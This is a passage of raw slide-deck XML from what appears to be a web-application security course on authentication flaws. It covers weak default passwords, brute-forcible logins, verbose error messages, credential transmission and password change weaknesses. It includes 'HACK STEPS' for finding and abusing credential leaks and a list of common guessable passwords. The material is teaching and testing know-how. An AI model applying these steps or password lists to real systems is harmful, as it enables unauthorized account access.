              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>administrator</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>demo</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>demouser</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>password</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>password1</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>password123</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>qwerty</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>test123</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>letmein</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>[organization’s name]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1427" name="Brute-Forcible Login"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Brute-Forcible Login</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431" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="985999" y="4011485"/>
            <a:ext cx="11032802" cy="1730630"/>
            <a:chOff x="0" y="3608356"/>
            <a:chExt cx="11032801" cy="1730629"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1429" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="3608356"/>
              <a:ext cx="11032802" cy="1730630"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 12820"/>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650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1430" name="&quot;Incorrect Password&quot; error messages"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="279191" y="3981324"/>
              <a:ext cx="10474420" cy="10601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marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>"Incorrect Password" error messages</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1432" name="Verbose Failure Messages"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Verbose Failure Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1433" name="an application informs you as to which piece of information was invalid"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494648" y="8144431"/>
            <a:ext cx="9992926" cy="663162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="283779" indent="-283779" defTabSz="548640">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400">
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>an application informs you as to which piece of information was invalid</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5" name="Vulnerable Transmission of Credentials"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Vulnerable Transmission of Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1436" name="Even on a secure HTTPS connection, unauthorized parties may exist:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Even on a secure HTTPS connection, unauthorized parties may exist:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Within the user’s browser history, within the web server logs, and within the logs of any reverse proxies employed within the hosting infrastructure. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>When the login request being handled via a redirect to a different URL with the same credentials passed as query string parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>When Web applications store user credentials in cookies, usually to implement poorly designed mechanisms for login, password change, “remember me,” and so on.</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8" name="Vulnerable Transmission of Credentials"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Vulnerable Transmission of Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Carry out a successful login while monitoring all traffic in both directions between the client and server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Identify every case in which the credentials are transmitted in either direction.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If any instances are found in which credentials are submitted in a URL query string, or as a cookie, or are transmitted back from the server to the client, understand what is happening. Try to find every means by which an attacker might interfere with the application to compromise other users’ credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If any sensitive information is transmitted over an unencrypted channel, this is, of course, vulnerable to interception.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="205740" indent="-205740">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If credentials are submitted using HTTPS but the login form is loaded using HTTP, then the application is vulnerable to a man-in-the-middle attack, which may be used to capture credentials.</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1" name="Password Change Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Password Change Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1442" name="Applications should have password change functions to:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:t>Applications should have password change functions to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Mitigate the threat of password compromise by reducing the window in which a given password can be targeted in a guessing attack and by reducing the window in which a compromised password can be used without detection by the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Be able to quickly change their password to reduce the threat of unauthorized use.</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4" name="Password Change Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Password Change Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1445" name="The password change functions my be vulnerable if it:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>The password change functions my be vulnerable if it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Provides a verbose error message indicating whether the requested username is valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Allows unrestricted guesses of the “existing password” field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Only check whether the “new password” and “confirm new password” fields have the same value after validating the existing password, thereby allowing an attack to succeed in discovering the existing password noninvasively.</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7" name="Password Change Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Password Change Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1448" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Identify any password change functionality within the application. If this is not explicitly linked from published content, it may still be implemented.</a:t>
            </a:r>
          </a:p>
          <a:p>
